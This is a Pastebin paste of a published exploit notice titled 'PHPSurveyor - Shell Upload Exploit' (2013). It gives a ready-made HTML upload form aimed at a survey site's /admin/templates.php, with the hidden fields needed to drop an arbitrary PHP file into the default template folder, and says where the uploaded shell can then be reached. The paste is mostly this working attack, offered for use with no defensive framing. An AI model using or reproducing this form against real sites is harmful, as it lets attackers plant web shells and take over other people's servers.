Advertisement
AndrewHaxalot

PHPSurveyor - Shell Upload Exploit

Dec 29th, 2013
121
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.32 KB | None | 0 0
  1. ##################################################
  2. ################-=[ G4eL ]=-######################
  3. ##################################################
  4. Exploit Title: PHPSurveyor - Shell Upload Exploit
  5. Author: G4eL
  6. Date: 26/12/2013
  7. Product: PHPSurveyor
  8. Official Site: http://www.limesurvey.org/
  9. Risk Level: High
  10. #################################################
  11. #################################################
  12.  
  13. /admin/templates.php - File Upload
  14. [URL SITE] = Default directory of PHPSurveyor
  15. Example : http://site.com/survey/
  16.  
  17. <form enctype='multipart/form-data' name='importsurvey' action='[URL SITE]/admin/templates.php' method='post'>
  18. <input class='btstyle' name="the_file" type="file" size="7">
  19. <input type='submit' value='Upload' class='btstyle' disabled>
  20. <input type='hidden' name='editfile' value=''>
  21. <input type='hidden' name='screenname' value=''>
  22. <input type='hidden' name='templatename' value='default'>
  23. <input type='hidden' name='action' value='upload'>
  24. </form>
  25.  
  26. File Uploaded in templates "default"!
  27. Example: http://site.com/survey/templates/default/G4eL.php
  28. "/templates/name of template/name of your file"
  29.  
  30. #################################################
  31. #################-=[ Contact ]=-#################
  32. 2403342020@qq.com (Email)
  33. live:s3cur3 (Skype)
  34. #################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement